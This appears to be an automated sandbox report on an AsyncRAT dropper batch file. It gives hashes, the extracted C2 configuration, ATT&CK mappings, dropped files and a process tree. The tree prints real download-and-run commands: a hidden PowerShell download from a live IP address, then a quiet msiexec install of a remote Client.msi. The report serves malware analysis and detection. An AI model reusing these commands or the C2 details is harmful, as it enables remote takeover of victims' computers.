asyncrat | f21b7aec9770dc80d20ac5fd871b6b88b7ba4586c2ae56faf724a23ee64a6193

General

Target

fr-obf.bat
Size

17KB
MD5

389078feb0d26c841b905168deaecd15
SHA1

e0013a66fad26afbbac701c3fbd6a0d85ddce3c9
SHA256

f21b7aec9770dc80d20ac5fd871b6b88b7ba4586c2ae56faf724a23ee64a6193
SHA512

ce51959c6d29112e575350013be45f87907edb9dc2c6bc3c8dc566e251a350bc361380202c34874aef71085f745dbf4e4ae4a760f457f49ff5e36f238785d238
SSDEEP

192:oZYztAEqvAb5JqjbLoUfSY1PfcLCL6lh2uxHwNy/FDcTjNolW/uw6yfzyKe:oZY5AEqvA5JEoiJ1PfcL1PDwiMVvWKe

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://103.179.189.111/porn.png

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

103.179.189.111:8848

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\MW-a07e98e6-909c-4c8c-bccb-7bb5b81cb31a\files\Client.exe	family_asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exemsiexec.exe

flow pid process

5 2884 powershell.exe
25 4508 msiexec.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2884 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

Client.exe

pid process

1896 Client.exe
Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

5080 MsiExec.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

ICACLS.EXE

pid process

4536 ICACLS.EXE
Use of msiexec (install) with remote resource 1 IoCs

Processes:

msiexec.exe

pid process

5116 msiexec.exe

flow	pid	process
5	2884	powershell.exe
25	4508	msiexec.exe

pid	process
1896	Client.exe

pid	process
5080	MsiExec.exe

pid	process
4536	ICACLS.EXE

pid	process
5116	msiexec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe

Drops file in Windows directory 7 IoCs

Processes:

EXPAND.EXEmsiexec.exe

description	ioc	process
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE
File opened for modification	C:\Windows\Installer\MSI563E.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI63EB.tmp	msiexec.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exemsiexec.exeClient.exe

pid	process
2884	powershell.exe
2884	powershell.exe
4508	msiexec.exe
4508	msiexec.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe
1896	Client.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

powershell.exemsiexec.exemsiexec.exeClient.exe

description	pid	process
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeShutdownPrivilege	5116	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5116	msiexec.exe
Token: SeSecurityPrivilege	4508	msiexec.exe
Token: SeCreateTokenPrivilege	5116	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5116	msiexec.exe
Token: SeLockMemoryPrivilege	5116	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5116	msiexec.exe
Token: SeMachineAccountPrivilege	5116	msiexec.exe
Token: SeTcbPrivilege	5116	msiexec.exe
Token: SeSecurityPrivilege	5116	msiexec.exe
Token: SeTakeOwnershipPrivilege	5116	msiexec.exe
Token: SeLoadDriverPrivilege	5116	msiexec.exe
Token: SeSystemProfilePrivilege	5116	msiexec.exe
Token: SeSystemtimePrivilege	5116	msiexec.exe
Token: SeProfSingleProcessPrivilege	5116	msiexec.exe
Token: SeIncBasePriorityPrivilege	5116	msiexec.exe
Token: SeCreatePagefilePrivilege	5116	msiexec.exe
Token: SeCreatePermanentPrivilege	5116	msiexec.exe
Token: SeBackupPrivilege	5116	msiexec.exe
Token: SeRestorePrivilege	5116	msiexec.exe
Token: SeShutdownPrivilege	5116	msiexec.exe
Token: SeDebugPrivilege	5116	msiexec.exe
Token: SeAuditPrivilege	5116	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5116	msiexec.exe
Token: SeChangeNotifyPrivilege	5116	msiexec.exe
Token: SeRemoteShutdownPrivilege	5116	msiexec.exe
Token: SeUndockPrivilege	5116	msiexec.exe
Token: SeSyncAgentPrivilege	5116	msiexec.exe
Token: SeEnableDelegationPrivilege	5116	msiexec.exe
Token: SeManageVolumePrivilege	5116	msiexec.exe
Token: SeImpersonatePrivilege	5116	msiexec.exe
Token: SeCreateGlobalPrivilege	5116	msiexec.exe
Token: SeRestorePrivilege	4508	msiexec.exe
Token: SeTakeOwnershipPrivilege	4508	msiexec.exe
Token: SeRestorePrivilege	4508	msiexec.exe
Token: SeTakeOwnershipPrivilege	4508	msiexec.exe
Token: SeDebugPrivilege	1896	Client.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

cmd.exemsiexec.exeMsiExec.exe

description	pid	process	target process
PID 4400 wrote to memory of 4796	4400	cmd.exe	chcp.com
PID 4400 wrote to memory of 4796	4400	cmd.exe	chcp.com
PID 4400 wrote to memory of 2192	4400	cmd.exe	cmd.exe
PID 4400 wrote to memory of 2192	4400	cmd.exe	cmd.exe
PID 4400 wrote to memory of 2340	4400	cmd.exe	find.exe
PID 4400 wrote to memory of 2340	4400	cmd.exe	find.exe
PID 4400 wrote to memory of 4744	4400	cmd.exe	find.exe
PID 4400 wrote to memory of 4744	4400	cmd.exe	find.exe
PID 4400 wrote to memory of 4624	4400	cmd.exe	findstr.exe
PID 4400 wrote to memory of 4624	4400	cmd.exe	findstr.exe
PID 4400 wrote to memory of 4820	4400	cmd.exe	findstr.exe
PID 4400 wrote to memory of 4820	4400	cmd.exe	findstr.exe
PID 4400 wrote to memory of 1488	4400	cmd.exe	findstr.exe
PID 4400 wrote to memory of 1488	4400	cmd.exe	findstr.exe
PID 4400 wrote to memory of 1992	4400	cmd.exe	findstr.exe
PID 4400 wrote to memory of 1992	4400	cmd.exe	findstr.exe
PID 4400 wrote to memory of 4808	4400	cmd.exe	cmd.exe
PID 4400 wrote to memory of 4808	4400	cmd.exe	cmd.exe
PID 4400 wrote to memory of 2884	4400	cmd.exe	powershell.exe
PID 4400 wrote to memory of 2884	4400	cmd.exe	powershell.exe
PID 4400 wrote to memory of 5116	4400	cmd.exe	msiexec.exe
PID 4400 wrote to memory of 5116	4400	cmd.exe	msiexec.exe
PID 4508 wrote to memory of 5080	4508	msiexec.exe	MsiExec.exe
PID 4508 wrote to memory of 5080	4508	msiexec.exe	MsiExec.exe
PID 4508 wrote to memory of 5080	4508	msiexec.exe	MsiExec.exe
PID 5080 wrote to memory of 4536	5080	MsiExec.exe	ICACLS.EXE
PID 5080 wrote to memory of 4536	5080	MsiExec.exe	ICACLS.EXE
PID 5080 wrote to memory of 4536	5080	MsiExec.exe	ICACLS.EXE
PID 5080 wrote to memory of 1620	5080	MsiExec.exe	EXPAND.EXE
PID 5080 wrote to memory of 1620	5080	MsiExec.exe	EXPAND.EXE
PID 5080 wrote to memory of 1620	5080	MsiExec.exe	EXPAND.EXE
PID 5080 wrote to memory of 1896	5080	MsiExec.exe	Client.exe
PID 5080 wrote to memory of 1896	5080	MsiExec.exe	Client.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fr-obf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4400
- C:\Windows\system32\chcp.com
  chcp.com 437
  2⤵
  PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:2192
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:2340
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:4744
- C:\Windows\system32\findstr.exe
  findstr /L /I set C:\Users\Admin\AppData\Local\Temp\fr-obf.bat
  2⤵
  PID:4624
- C:\Windows\system32\findstr.exe
  findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\fr-obf.bat
  2⤵
  PID:4820
- C:\Windows\system32\findstr.exe
  findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\fr-obf.bat
  2⤵
  PID:1488
- C:\Windows\system32\findstr.exe
  findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\fr-obf.bat
  2⤵
  PID:1992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:4808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://103.179.189.111/porn.png', \"$env:TEMP\al.png\"); start \"$env:TEMP\al.png\"}"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2884
- C:\Windows\system32\msiexec.exe
  msiexec /quiet /i http://103.179.189.111/Client.msi
  2⤵
  - Use of msiexec (install) with remote resource
  - Suspicious use of AdjustPrivilegeToken
  PID:5116

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4508
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding CB7B6851B518C18E50C7BE9F09D12C89
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5080
- - C:\Windows\SysWOW64\ICACLS.EXE
    "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-a07e98e6-909c-4c8c-bccb-7bb5b81cb31a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
    3⤵
    - Modifies file permissions
    PID:4536
- - C:\Windows\SysWOW64\EXPAND.EXE
    "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
    3⤵
    - Drops file in Windows directory
    PID:1620
- - C:\Users\Admin\AppData\Local\Temp\MW-a07e98e6-909c-4c8c-bccb-7bb5b81cb31a\files\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\MW-a07e98e6-909c-4c8c-bccb-7bb5b81cb31a\files\Client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MW-a07e98e6-909c-4c8c-bccb-7bb5b81cb31a\files.cab

Filesize
47KB

MD5
16ebf2cc73df381da5b897f52a78ee22

SHA1
c2689939e1c957c30ef261f139057a973c618f47

SHA256
b2f5fcf9b63c873170b0cf7680831251dcc38c703e42fb558bed2120bd15e156

SHA512
cfb58afd9b6b6433dedc8e2364013845d8ca023025ac8a8fecd7930493abc80c5f4961ee279ea06d7658adb4e9f2893c9ece0af8b2ae278d1f99713255a3f683

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-a07e98e6-909c-4c8c-bccb-7bb5b81cb31a\files\Client.exe

Filesize
47KB

MD5
c69f098974248c79def70daf8b16bb8b

SHA1
793c9cd72b635d731686db373b5136ff63cabc0a

SHA256
93a0782c15f0c0049c85a07d09742805398aa6491b0b5a31d25603dc233c8f7d

SHA512
d4d29f682cd42a3b494563929ae33356a386f2e9383010fdac8e95ce4c3e77100979d9040faeeb419eaecd82cee66a0521f2d50ee140ac7e0d7b25e77e2ae945

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-a07e98e6-909c-4c8c-bccb-7bb5b81cb31a\msiwrapper.ini

Filesize
414B

MD5
21db250118b6555f368f36620ae61084

SHA1
3ed820717e13009e4eea462f45bee0845f3c18a4

SHA256
18a0d66ac5ba22ddfc3cba13f6f447c3f9b6b6a68f5716354b5e4aaab5261678

SHA512
11370e5c7a64076ebdf8cc44829d456f7d1dad56adfec56f5a2dde105f8c363bacd20ab120dbbb7c97d416ef7591c639e050179fdb5e73249fe905c5ceeb3567

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-a07e98e6-909c-4c8c-bccb-7bb5b81cb31a\msiwrapper.ini

Filesize
1KB

MD5
ae89fbe228e82cef4329442358b21a30

SHA1
45ea5e50cebbed8aed0ea29b06f9bf4657e72ff0

SHA256
2872dca5287520a0ce8c7b1858e186145987a483ca810ae79f54c83c4a9feee6

SHA512
5bf0232ca8e0917401f27517467fe122db050c022b3466b8e964e844b40a66941c86bc5740b4fc67843fe01d5301f70057cc9fd908f5343bb8c060b58f12859c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1awb4px.osv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp

Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
C:\Windows\Installer\MSI563E.tmp

Filesize
292KB

MD5
6bd9dac0f28211bda45fb0c569580e65

SHA1
d2b53dbd29537d7844d17f60c3ca263740a7b8db

SHA256
fecd40361bf0eccab0681d13c32136860ebf9b8d5cc96c4eda6a43af32abe079

SHA512
c3f30f6bd2f2b60b65b3da0e96c1738dc859455cccb354b57d97ad8fe200bea71adf32b865903efac2bc2c8d833dd7d23956dfa7cf3dcefaec63ca47f6fd6ab1

Download Submit
C:\Windows\Installer\MSI63EB.tmp

Filesize
208KB

MD5
0c8921bbcc37c6efd34faf44cf3b0cb5

SHA1
dcfa71246157edcd09eecaf9d4c5e360b24b3e49

SHA256
fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

SHA512
ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

Download Submit
memory/1896-90-0x0000000000760000-0x0000000000772000-memory.dmp

Filesize
72KB

Download
memory/2884-10-0x000001BA78520000-0x000001BA78542000-memory.dmp

Filesize
136KB

Download
memory/2884-20-0x00007FF8B91A0000-0x00007FF8B9C61000-memory.dmp

Filesize
10.8MB

Download
memory/2884-16-0x00007FF8B91A0000-0x00007FF8B9C61000-memory.dmp

Filesize
10.8MB

Download
memory/2884-15-0x00007FF8B91A0000-0x00007FF8B9C61000-memory.dmp

Filesize
10.8MB

Download
memory/2884-4-0x00007FF8B91A3000-0x00007FF8B91A5000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads